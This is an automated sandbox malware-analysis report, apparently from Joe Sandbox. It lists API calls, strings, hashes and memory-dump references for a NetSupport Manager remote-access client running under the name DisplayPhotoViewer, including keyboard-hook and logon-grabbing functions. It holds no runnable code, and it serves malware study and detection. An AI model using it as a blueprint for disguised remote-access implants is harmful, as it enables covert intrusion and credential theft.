Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                                    • API String ID: 336719646-37721096
                                                                                                    • Opcode ID: fb47d26e2b320981d3be43dfb150f47d724b4478e50a2c4446b854928f5e64e7
                                                                                                    • Instruction ID: 009040ae52c6831aa03cd40e0bad1ac2b62ea8a30d96e08e3b1cba246fc5cad1
                                                                                                    • Opcode Fuzzy Hash: fb47d26e2b320981d3be43dfb150f47d724b4478e50a2c4446b854928f5e64e7
                                                                                                    • Instruction Fuzzy Hash: C7E2D774F412669FD712DFE4CCD4BADF7A5AB4830CF5080A9EA15A7284EB706D40CB62

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    Strings
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _malloc_memsetwsprintf
                                                                                                    • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$22/01/15 11:35:42 V12.01F14$910646$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape
                                                                                                    • API String ID: 3802068140-1962935003
                                                                                                    • Opcode ID: 32b016c17fafd803046ec645f98191fb1e3e94216ee79620eb962271b9480f34
                                                                                                    • Instruction ID: 9d0f9820ae9125632e92551a5da56ecdebc7d9da3861688bc661f885029e80f6
                                                                                                    • Opcode Fuzzy Hash: 32b016c17fafd803046ec645f98191fb1e3e94216ee79620eb962271b9480f34
                                                                                                    • Instruction Fuzzy Hash: 6432D5B5E002659FDB12DFD4CD84BEDB7B9BB45308F9041E9E518A7240EB706A84CF61

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,74DF23A0), ref: 11139913
• LoadLibraryA.KERNEL32(?), ref: 1113995C
• LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11139975
• LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11139984
• GetModuleHandleA.KERNEL32(?), ref: 1113998A
• GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1113999E
• GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 111399BD
• GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 111399C8
• GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 111399D3
• GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 111399DE
• GetProcAddress.KERNEL32(00000000,StackWalk), ref: 111399E9
• GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 111399F4
• GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 111399FF
• GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 11139A0A
• GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11139A15
• GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11139A20
• GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 11139A2B
• GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11139A36
• GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 11139A41
• GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 11139A4C
  • Part of subcall function 1107D210: _strrchr.LIBCMT ref: 1107D21E
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
• String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
• API String ID: 3874234733-2061581830

Control-flow Graph

APIs
• GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1113789C
• SetLastError.KERNEL32(00000078), ref: 111378AF
• FreeLibrary.KERNEL32(00000000), ref: 111378C1
• LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 111378E4
• GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11137949
• _memset.LIBCMT ref: 1113795D
• LoadCursorA.USER32(00000000,00007F00), ref: 111379AD
• GetStockObject.GDI32(00000000), ref: 111379B7
• LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11137A61
• GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11137A76
• RegisterClassExA.USER32(?), ref: 111379CE
  • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
• SetTimer.USER32(00000000,00000000,000003E8,11133920), ref: 11137B8D
• #17.COMCTL32(?,?,?,00000000,00000000), ref: 11137BBB
• LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11137BC6
  • Part of subcall function 11015B30: LoadLibraryA.KERNEL32(User32.dll,?,1111ACB9,?), ref: 11015B38
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Similarity
• API ID: LibraryLoad$AddressClassProc$CursorErrorFreeInfoLastObjectRegisterStockTimer__wcstoi64_memset
• String ID: *quiet$Client$DisableDPIAware$HookKeyboard$InitUI (%d)$Inited VolumeControl.$Initing VolumeControl...$NSMGetAppIcon()$NSMWClass$SetProcessDPIAware$TraceCopyData$UI.CPP$View$_License$_debug$imm32$pcihooks$riched32.dll
• API String ID: 2794364348-1856305019

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(setupapi.dll,218EC38C,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11179BD8), ref: 110A4833
• GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A4857
• SetupDiGetClassDevsA.SETUPAPI(1119B5A4,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11179BD8,000000FF), ref: 110A4871
• GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A489C
• _free.LIBCMT ref: 110A48D0
• GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A48E2
• GetLastError.KERNEL32 ref: 110A490D
• _malloc.LIBCMT ref: 110A4923
• GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A4945
• SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11179BD8,000000FF,?,1102D996,Client), ref: 110A4977
• SetLastError.KERNEL32(00000078), ref: 110A498B
• GetLastError.KERNEL32 ref: 110A4991
• _free.LIBCMT ref: 110A49A3
• SetLastError.KERNEL32(00000078), ref: 110A49B4
• SetLastError.KERNEL32(00000078), ref: 110A49C1
• _free.LIBCMT ref: 110A49D4
• FreeLibrary.KERNEL32(?,?), ref: 110A49E4
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11179BD8,000000FF,?,1102D996,Client), ref: 110A4A88
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Similarity
• API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
• String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
• API String ID: 3464732724-3340099623

Control-flow Graph

Memory Dump Source
• Source File: 00000006.00000002.3127485200.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: *.fip$PBM$PBMRAW$PGM$PGMRAW$PPM$PPMRAW$Portable Bitmap (ASCII)$Portable Bitmap (RAW)$Portable Greymap (ASCII)$Portable Greymap (RAW)$Portable Pixelmap (ASCII)$Portable Pixelmap (RAW)$^P1$^P2$^P3$^P4$^P5$^P6$pbm$pgm$ppm$Dx
                                                                                                    • API String ID: 0-1275677358
                                                                                                    • Opcode ID: df55e91332bba54cd0aa446571f94493eb8ce250859a77f91e6f9663f57ed146
                                                                                                    • Instruction ID: b2b3ad046eabd30ceafa37f7010464ca4575cc57bc610209a677724c45f2eb30
                                                                                                    • Opcode Fuzzy Hash: df55e91332bba54cd0aa446571f94493eb8ce250859a77f91e6f9663f57ed146
                                                                                                    • Instruction Fuzzy Hash: 8D81B3382483CC67F315E7F0DC62FEF3656DB82684F80021AF5096F6C6DE66798446A6

Control-flow Graph
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,6F901370,?,0000001A), ref: 110271DD
• _strrchr.LIBCMT ref: 110271EC
  • Part of subcall function 11159D1C: __stricmp_l.LIBCMT ref: 11159D59
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: FileModuleName__stricmp_l_strrchr
• String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
• API String ID: 1609618855-357498123
• Opcode ID: 63d8dd5fead9e0649ce10dd2ca09b8f44365e9f9cca71fc1be97b356fef316e2
• Instruction ID: 2674c73fd36b65bbcd86ca3171f9a7e695c26ead41fc2bd3ff21a573544fd277
• Opcode Fuzzy Hash: 63d8dd5fead9e0649ce10dd2ca09b8f44365e9f9cca71fc1be97b356fef316e2
• Instruction Fuzzy Hash: 7B120A78D056A68FDB66CF28CC84BD8B7B1AB2A30CF5040E9CCE557201EB71558ACF52

Control-flow Graph
APIs
• LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 11081F0C
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11081F2A
• LoadLibraryA.KERNEL32(?), ref: 11081F6C
• GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11081F87
• GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 11081F9C
• GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 11081FAD
• GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 11081FBE
• GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 11081FCF
• GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11081FE0
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad$FileModuleName
• String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
• API String ID: 2201880244-3035937465
• Opcode ID: 37df38a3cffaa653d28c33417d16f14043aebe152239492477c98f6f420c671b
• Instruction ID: e6f83acf43405f238bea454260f9dfef01cad1b13766f442e244b07dfca12fa4
• Opcode Fuzzy Hash: 37df38a3cffaa653d28c33417d16f14043aebe152239492477c98f6f420c671b
• Instruction Fuzzy Hash: 2851DD70A0430ADFD710DF39C890AAAFBE9AF54304B0189AEEC95C7242EA70E441CF55

Control-flow Graph
APIs
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,?,00000001,?), ref: 1102EED8
  • Part of subcall function 11139370: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110784B,75BF8400,?,?,1113B43F,00000000,CSDVersion,00000000,00000000,?), ref: 11139390
• RegCloseKey.ADVAPI32(?), ref: 1102EF6D
  • Part of subcall function 11159A6A: __isdigit_l.LIBCMT ref: 11159A8F
• GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1102EFF5
• GetProcAddress.KERNEL32(00000000), ref: 1102EFFC
• GetNativeSystemInfo.KERNEL32(?), ref: 1102F00A
• GetStockObject.GDI32(0000000D), ref: 1102F1E3
• GetObjectA.GDI32(00000000,0000003C,?), ref: 1102F1F3
• SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1102F231
• SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1102F237
• InterlockedExchange.KERNEL32(0BA62AA0,00001388), ref: 1102F2B8
• GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 1102F2EA
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: ErrorModeObject$AddressCloseExchangeHandleInfoInterlockedModuleNativeOpenProcQueryStockSystemValue__isdigit_l
• String ID: .%d$3$CurrentVersion$Error %s unloading audiocap dll$GetNativeSystemInfo$SOFTWARE\Microsoft\Windows NT\CurrentVersion$kernel32.dll$pcicl32
• API String ID: 3742979543-181536097
• Opcode ID: 07d949fd793ad3154d2041483b58dc825fac91b79b7e6eeac6ebf98cdf3f22b2
• Instruction ID: 457bdd8ea33ed7f851370b106bdf202f4828996bada1dd751398929caa3caa22
• Opcode Fuzzy Hash: 07d949fd793ad3154d2041483b58dc825fac91b79b7e6eeac6ebf98cdf3f22b2
• Instruction Fuzzy Hash: 3BF15BB1D043659AEB52CBB4CC84B9DFBF4AB4534CF9401EEE849A3241EB755A80CB53

                                                                                                    Control-flow Graph

APIs
• RegCloseKey.ADVAPI32(00000000), ref: 11137D0A
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Close
• String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h
• API String ID: 3535843008-1157355927
• Opcode ID: e45e2e9329b6e2a04c9c72a8dc63433b6374c9d185d685d75f94056064adcd44
• Instruction ID: 13038bebbc0407b741a54bdcf6c30d7b08854a2d75f5608491db70441526b830
• Opcode Fuzzy Hash: e45e2e9329b6e2a04c9c72a8dc63433b6374c9d185d685d75f94056064adcd44
• Instruction Fuzzy Hash: 6342E475E106999FEB11CB60CD80BEEFB75AFC5319F0041D8D80967285EA72AE84CF61

Control-flow Graph

APIs
  • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
  • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
  • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
• InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11070395
• InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 1107039B
• InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 110703A1
• InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 110703AA
• InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 110703B0
• InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 110703B6
• _strncpy.LIBCMT ref: 11070418
• ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 1107047F
• CreateThread.KERNEL32(00000000,00004000,Function_0006C5A0,00000000,00000000,?), ref: 1107051C
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11070523
• SetTimer.USER32(00000000,00000000,000000FA,1105F7A0), ref: 11070567
• std::exception::exception.LIBCMT ref: 11070618
• __CxxThrowException@8.LIBCMT ref: 11070633
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
• String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
• API String ID: 703120326-1497550179
• Opcode ID: bc9c69fd0252a195519e0fc26bf5cc27cd1d4f877e0e716d7d386b6e77d425a6
• Instruction ID: 0f209e49085ac6e6bdb48bab393d88940930d1ef29b69fa8e9b616e1b55bc937
• Opcode Fuzzy Hash: bc9c69fd0252a195519e0fc26bf5cc27cd1d4f877e0e716d7d386b6e77d425a6
• Instruction Fuzzy Hash: 95B1D5B5E00745AFE710CBA4CD84FDAF7F4BB49308F0085A9E65997281EB70BA44CB65

Control-flow Graph

APIs
  • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
  • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
  • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
• OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas), ref: 111011EA
• CloseHandle.KERNEL32(00000000), ref: 111011F9
• GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 1110120B
• LoadLibraryA.KERNEL32(?), ref: 11101241
• GetProcAddress.KERNEL32(?,GrabKM), ref: 1110126E
• GetProcAddress.KERNEL32(?,LoggedOn), ref: 11101286
• FreeLibrary.KERNEL32(?), ref: 111012AB
  • Part of subcall function 11107630: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,111085B5,11108150,00000001,00000000), ref: 11107647
  • Part of subcall function 11107630: CreateThread.KERNEL32(00000000,111085B5,00000001,00000000,00000000,0000000C), ref: 1110766A
  • Part of subcall function 11107630: WaitForSingleObject.KERNEL32(?,000000FF,?,111085B5,11108150,00000001,00000000,?,?,?,?,?,1102F5F3), ref: 11107697
  • Part of subcall function 11107630: CloseHandle.KERNEL32(?,?,111085B5,11108150,00000001,00000000,?,?,?,?,?,1102F5F3), ref: 111076A1
• GetStockObject.GDI32(0000000D), ref: 111012BF
• GetObjectA.GDI32(00000000,0000003C,?), ref: 111012CF
• InitializeCriticalSection.KERNEL32(0000003C), ref: 111012EB
• InitializeCriticalSection.KERNEL32(111E41A4), ref: 111012F6
  • Part of subcall function 110FF670: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,1117ECB6,000000FF), ref: 110FF743
  • Part of subcall function 110FF670: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 110FF78C
• CloseHandle.KERNEL32(00000000,Function_000FAEE0,00000001,00000000), ref: 11101339
  • Part of subcall function 110996C0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F0A64,00000030,11137B17,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 110996E1
  • Part of subcall function 110996C0: OpenProcessToken.ADVAPI32(00000000,?,?,110F0A64,00000030,11137B17,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 110996E8
  • Part of subcall function 110996C0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 11099707
• CloseHandle.KERNEL32(00000000,Function_000FAEE0,00000001,00000000), ref: 1110138A
• CloseHandle.KERNEL32(00000000,Function_000FAEE0,00000001,00000000), ref: 111013DF
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
• String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
• API String ID: 3930710499-403456261
• Opcode ID: e8ba90978b96cab55415aba3810908860ea4d1640e17fc30acdc6a879146f2be
• Instruction ID: 6c9ea3e9fbdaa0aaae64d8e31c620b635071e328df7008761fc2cf2c78d098be
• Opcode Fuzzy Hash: e8ba90978b96cab55415aba3810908860ea4d1640e17fc30acdc6a879146f2be
• Instruction Fuzzy Hash: 4181C2B5D04755AFDB11CFB89C88B9AFBE4BB48308F004569E569D7280E7749A40CB50

Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 1113B380: GetVersionExA.KERNEL32(111E4A50,75BF8400), ref: 1113B3B0
                                                                                                      • Part of subcall function 1113B380: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1113B3EF
                                                                                                      • Part of subcall function 1113B380: _memset.LIBCMT ref: 1113B40D
                                                                                                      • Part of subcall function 1113B380: _strncpy.LIBCMT ref: 1113B4CF
                                                                                                      • Part of subcall function 1113B380: RegCloseKey.ADVAPI32(00000000), ref: 1113B4DF
                                                                                                    • PostMessageA.USER32(0006029E,000006CF,00000007,00000000), ref: 1113081F
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • SetWindowTextA.USER32(0006029E,00000000), ref: 111308C7
                                                                                                    • IsWindowVisible.USER32(0006029E), ref: 1113098C
                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 111309AC
                                                                                                    • IsWindowVisible.USER32(0006029E), ref: 111309BA
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 111309E8
                                                                                                    • EnableWindow.USER32(0006029E,00000001), ref: 111309F7
                                                                                                    • IsWindowVisible.USER32(0006029E), ref: 11130A48
                                                                                                    • IsWindowVisible.USER32(0006029E), ref: 11130A55
                                                                                                    • EnableWindow.USER32(0006029E,00000000), ref: 11130A69
                                                                                                    • EnableWindow.USER32(0006029E,00000000), ref: 111309CF
                                                                                                      • Part of subcall function 11129200: ShowWindow.USER32(0006029E,11130A72,?,11130A72,00000007,?,?,?,?,?,00000000), ref: 1112920E
                                                                                                    • EnableWindow.USER32(0006029E,00000001), ref: 11130A7D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
